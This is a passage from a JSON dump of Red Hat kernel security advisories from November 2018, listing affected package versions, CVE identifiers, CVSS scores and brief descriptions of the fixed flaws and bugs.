"packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "kernel-debuginfo-common-ppc64", "packageFilename": "kernel-debuginfo-common-ppc64-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "kernel-debuginfo-common-ppc64le", "packageFilename": "kernel-debuginfo-common-ppc64le-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "kernel-debuginfo-common-s390x", "packageFilename": "kernel-debuginfo-common-s390x-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "kernel-debuginfo-common-x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-3.10.0-514.61.1.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "kernel-kdump", "packageFilename": "kernel-kdump-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "kernel-kdump-debuginfo", "packageFilename": "kernel-kdump-debuginfo-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "kernel-kdump-devel", "packageFilename": "kernel-kdump-devel-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "kernel-tools", "packageFilename": "kernel-tools-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "kernel-tools", "packageFilename": "kernel-tools-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "kernel-tools", "packageFilename": "kernel-tools-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "kernel-tools-debuginfo", "packageFilename": "kernel-tools-debuginfo-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "kernel-tools-debuginfo", "packageFilename": "kernel-tools-debuginfo-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "kernel-tools-debuginfo", "packageFilename": "kernel-tools-debuginfo-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "kernel-tools-libs", "packageFilename": "kernel-tools-libs-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "kernel-tools-libs", "packageFilename": "kernel-tools-libs-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "kernel-tools-libs", "packageFilename": "kernel-tools-libs-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "kernel-tools-libs-devel", "packageFilename": "kernel-tools-libs-devel-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "kernel-tools-libs-devel", "packageFilename": "kernel-tools-libs-devel-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "kernel-tools-libs-devel", "packageFilename": "kernel-tools-libs-devel-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "perf", "packageFilename": "perf-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "perf", "packageFilename": "perf-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "perf", "packageFilename": "perf-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "perf", "packageFilename": "perf-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* kernel: out-of-bounds access in the show_timer function in kernel/time/posix-timers.c (CVE-2017-18344)\n\n* kernel: Integer overflow in Linux's create_elf_tables function (CVE-2018-14634)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Qualys Research Labs for reporting CVE-2018-14634.\n\nBug Fix(es):\n\n* On systems running Red Hat Enterprise Linux 7.3 with Red Hat OpenShift Container Platform 3.5, a node sometimes got into \"NodeNotReady\" state after a CPU softlockup. Consequently, the node was not available. This update fixes some scheduling latency sources in memory compaction and in the inodes memory reclaim. As a result, nodes no longer get into \"NodeNotReady\" state under the described circumstances. (BZ#1625866)\n\n* Previously, a kernel panic occurred when the kernel tried to make an out of bound access to the array that describes the L1 Terminal Fault (L1TF) mitigation state on systems without Extended Page Tables (EPT) support. This update extends the array of mitigation states to cover all the states, which effectively prevents out of bound array access. Also, this update enables rejecting invalid, irrelevant values, that might be erroneously provided by the userspace. As a result, the kernel no longer panics in the described scenario. (BZ#1629566)\n\n* Previously, a packet was missing the User Datagram Protocol (UDP) payload checksum during a full checksum computation, if the hardware checksum was not applied. As a consequence, a packet with an incorrect checksum was dropped by a peer. With this update, the kernel includes the UDP payload checksum during the full checksum computation. As a result, the checksum is computed correctly and the packet can be received by the peer. (BZ#1635794)", "reporter": "RedHat", "published": "2018-11-13T21:57:42", "type": "redhat", "title": "(RHSA-2018:3591) Important: kernel security and bug fix update", "enchantments": {"score": {"modified": "2018-11-13T18:41:47", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-18344", "CVE-2018-14634"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-11-13T21:59:35", "id": "RHSA-2018:3591", "href": "https://access.redhat.com/errata/RHSA-2018:3591", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-11-13T18:42:32", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-3.10.0-327.76.1.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "noarch", "packageName": "kernel-abi-whitelists", "packageFilename": "kernel-abi-whitelists-3.10.0-327.76.1.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "kernel-debuginfo-common-x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "kernel-devel", "packageFilename": "kernel-devel-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "noarch", "packageName": "kernel-doc", "packageFilename": "kernel-doc-3.10.0-327.76.1.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "kernel-headers", "packageFilename": "kernel-headers-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "kernel-tools", "packageFilename": "kernel-tools-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "kernel-tools-debuginfo", "packageFilename": "kernel-tools-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "kernel-tools-libs", "packageFilename": "kernel-tools-libs-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "kernel-tools-libs-devel", "packageFilename": "kernel-tools-libs-devel-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "perf", "packageFilename": "perf-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "perf-debuginfo", "packageFilename": "perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "python-perf", "packageFilename": "python-perf-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-327.76.1.el7", "arch": "x86_64", "packageName": "python-perf-debuginfo", "packageFilename": "python-perf-debuginfo-3.10.0-327.76.1.el7.x86_64.rpm", "operator": "lt"}], "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A flaw named FragmentSmack was found in the way the Linux kernel handled reassembly of fragmented IPv4 and IPv6 packets. A remote attacker could use this flaw to trigger time and calculation expensive fragment reassembly algorithm by sending specially crafted packets which could lead to a CPU saturation and hence a denial of service on the system. (CVE-2018-5391)\n\n* kernel: out-of-bounds access in the show_timer function in kernel/time/posix-timers.c (CVE-2017-18344)\n\n* kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact (CVE-2018-10675)\n\n* kernel: Integer overflow in Linux's create_elf_tables function (CVE-2018-14634)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.\n\nRed Hat would like to thank Juha-Matti Tilli (Aalto University - Department of Communications and Networking and Nokia Bell Labs) for reporting CVE-2018-5391 and Qualys Research Labs for reporting CVE-2018-14634.\n\nBug Fix(es):\n\n* Previously, a kernel panic occurred when the kernel tried to make an out of bound access to the array that describes the L1 Terminal Fault (L1TF) mitigation state on systems without Extended Page Tables (EPT) support. This update extends the array of mitigation states to cover all the states, which effectively prevents out of bound array access. Also, this update enables rejecting invalid, irrelevant values, that might be erroneously provided by the userspace. As a result, the kernel no longer panics in the described scenario. (BZ#1629565)\n\n* Previously, a packet was missing the User Datagram Protocol (UDP) payload checksum during a full checksum computation, if the hardware checksum was not applied. As a consequence, a packet with an incorrect checksum was dropped by a peer. With this update, the kernel includes the UDP payload checksum during the full checksum computation. As a result, the checksum is computed correctly and the packet can be received by the peer. (BZ#1635792)\n\n* Previously, a transform lookup through the xfrm framework could be performed on an already transformed destination cache entry (dst_entry). When using User Datagram Protocol (UDP) over IPv6 with a connected socket in conjunction with Internet Protocol Security (IPsec) in Encapsulating Security Payload (ESP) transport mode. As a consequence, invalid IPv6 fragments transmitted from the host or the kernel occasionally terminated unexpectedly due to a socket buffer (SKB) underrun. With this update, the xfrm lookup on an already transformed dst_entry is not possible. As a result, using UDP iperf utility over IPv6 ESP no longer causes invalid IPv6 fragment transmissions or a kernel panic. (BZ#1639586)", "reporter": "RedHat", "published": "2018-11-13T21:57:14", "type": "redhat", "title": "(RHSA-2018:3590) Important: kernel security and bug fix update", "enchantments": {"score": {"modified": "2018-11-13T18:42:32", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2017-18344", "CVE-2018-10675", "CVE-2018-14634", "CVE-2018-5391"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2018-11-13T21:59:36", "id": "RHSA-2018:3590", "href": "https://access.redhat.com/errata/RHSA-2018:3590", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-13T16:43:59", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "kernel", "packageFilename": "kernel-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "kernel", "packageFilename": "kernel-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "kernel", "packageFilename": "kernel-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-3.10.0-693.43.1.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "noarch", "packageName": "kernel-abi-whitelists", "packageFilename": "kernel-abi-whitelists-3.10.0-693.43.1.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "kernel-bootwrapper", "packageFilename": "kernel-bootwrapper-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "kernel-bootwrapper", "packageFilename": "kernel-bootwrapper-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "kernel-debug", "packageFilename": "kernel-debug-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "kernel-debug-debuginfo", "packageFilename": "kernel-debug-debuginfo-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "kernel-debug-devel", "packageFilename": "kernel-debug-devel-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-3.10.0-693.43.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64le", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-3.10.0-693.43.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "s390x", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-3.10.0-693.43.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "x86_64", "packageName": "kernel-debuginfo", "packageFilename": "kernel-debuginfo-3.10.0-693.43.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-693.43.1.el7", "arch": "ppc64", "packageName": "kernel-debuginfo-common-ppc64", 